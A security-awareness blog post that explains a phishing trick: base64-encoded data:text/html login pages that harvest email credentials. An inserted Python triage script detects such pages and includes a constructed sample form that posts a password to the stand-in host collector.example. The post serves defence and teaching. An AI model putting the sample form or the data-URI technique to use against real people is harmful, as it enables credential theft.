Keeping up with encoded Phishing Attacks

Cyber-criminals constantly evolve the nature and complexity of their attack vectors.

This article explores an old technique — Phishing — and how one may fall victim depending on one’s level of security awareness. Before going into details of this specific attack, please remember a few simple rules:

  1. Be wary of email attachments.
  2. Never supply your email login credentials (username/password/token) as a prerequisite to opening an attachment or to any unknown site.
  3. If, for any reason, you failed to heed the above and have already supplied your credentials somewhere, reset your password immediately!

This specific attack utilized an HTML email message containing the “name-of-the-file-to-download”, “View” and “Download” links similar to those provided by Gmail, as shown here:

Gmail-like links in the phishing email

Clicking any of those links leads to this address [http://], which loads a base64-encoded page into the web browser's address bar using the data:text/html;base64,ENCODED_DATA_IS_HERE format. The web browser then decodes and renders this page as shown below:

Browser translates the encoded page into this

In reality, it was a simple HTML page with a blurred image used as the page background. Signing in to this page then triggered a submission to a server-side PHP script — at this point the attacker already has the victim’s credentials. This PHP script then utilizes the same “data:text/html;base64,” to re-direct the browser to a missing document.
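A defender-side triage sketch for the flow described above, added here and not part of the original article: it finds data:text/html;base64 URIs in captured text (an email body or a redirect target), decodes them, and reports whether the hidden page holds a password field that posts to a remote URL. The sample page and the host collector.example are constructed placeholders.

```python
import base64
import binascii
import re
from html.parser import HTMLParser
from urllib.parse import unquote

# data:text/html;base64,<payload> as it appears in an href or a redirect target
DATA_URI_RE = re.compile(r"data:text/html;base64,([A-Za-z0-9+/=%]+)", re.IGNORECASE)

class FormAudit(HTMLParser):
    """Records form actions and whether any password input exists."""
    def __init__(self):
        super().__init__()
        self.actions, self.has_password = [], False

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag == "form":
            self.actions.append(a.get("action") or "")
        elif tag == "input" and (a.get("type") or "").lower() == "password":
            self.has_password = True

def decode_payload(payload):
    """Decode a payload that may be percent-encoded or missing '=' padding."""
    raw = unquote(payload)
    raw += "=" * (-len(raw) % 4)
    return base64.b64decode(raw).decode("utf-8", errors="replace")

def audit(text):
    """Return one finding per embedded data: page found in text."""
    findings = []
    for match in DATA_URI_RE.finditer(text):
        try:
            page = decode_payload(match.group(1))
        except (binascii.Error, ValueError):
            continue  # not valid base64, nothing to inspect
        parser = FormAudit()
        parser.feed(page)
        remote = any(a.lower().startswith(("http:", "https:")) for a in parser.actions)
        findings.append({"password_field": parser.has_password,
                         "form_actions": parser.actions,
                         "suspicious": parser.has_password and remote})
    return findings

# Constructed sample: login-style page posting to a placeholder host.
SAMPLE_PAGE = ('<form action="http://collector.example/post.php" method="post">'
               '<input type="email" name="u"><input type="password" name="p"></form>')
SAMPLE_REDIRECT = "data:text/html;base64," + base64.b64encode(SAMPLE_PAGE.encode()).decode()

if __name__ == "__main__":
    print(audit(SAMPLE_REDIRECT))
```

A finding with "suspicious" set is a reason to inspect the decoded page and the form action by hand, not a verdict on its own.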

Following the simple preventive steps above and being generally cyber-security conscious can go a long way to keep us safe online.

Please share your Phishing experiences.